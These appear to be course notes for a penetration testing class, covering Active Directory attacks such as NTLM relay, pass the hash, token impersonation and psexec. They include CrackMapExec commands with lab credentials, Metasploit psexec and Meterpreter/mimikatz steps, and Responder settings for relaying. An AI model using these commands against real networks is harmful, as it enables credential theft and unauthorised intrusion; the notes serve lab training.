Ctrlk

Week 9: NTLM

NTLM Relay, Token Impersonation, Pass the Hash, PsExec, and more

Active Directory Exploitation - This lesson focuses on the recognition of vulnerabilities and exploitation tactics in an internal Active Directory environment. Attacks that will be introduced include: LLMNR poisoning/hash cracking, SMB hash relaying, pass the hash, token impersonation, kerberoasting, GPP/c-password attacks, and PowerShell attacks. More attacks will likely be added as the lesson is written, but the most common have been provided.

Important Readings

LogoFuzzySecurity | Windows Privilege Escalation Fundamentalswww.fuzzysecurity.com
LogoTop Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition)Medium

Notes

CrackMapExec and psexec

  • install crackmapexec

crackmapexec smb <ip range> -u Administrator -p 'P@$$word!' -d MARVEL

  • msf5 > use exploit/windows/smb/psexec

  • try all the target options for psexec: set target 3

    • Automatic

    • Powershell

    • Native Upload

    • MOF upload

  • sysinfo

    • x64 Architecture but 32-bit Meterpreter

    • you can look through payloads and find a better one sometime

In meterpreter shell, type load and hit tab twice to see all the different things to load, e.g. kiwi, mimikatz

  • Process Migration, get a x64 Meterpreter shell

  • Local Administrator account could be the same across many computers if IT images them from the same base image.

  • You can pass the hash with crackmapexec -H or with psexec

NTLM Relay

If communications are not digitally signed, you can NTLM relay. SMB signing is defaulted OFF.

  • Heath demonstrates environment were a user has administrative privileges on multiple machines.

  • Edited Responder.conf: Turned off SMB and HTTP server

  • Start Responder.py -I eth0 -rdw

    • Wait

  • point a victim machine to yours to in File Explorer e.g. \\192.168.202.173

PreviousWeek 8: LLMNR/NBT-NS PoisoningNextWeek 10: MS17-010, GPP/cPasswords, and Kerberoasting

Last updated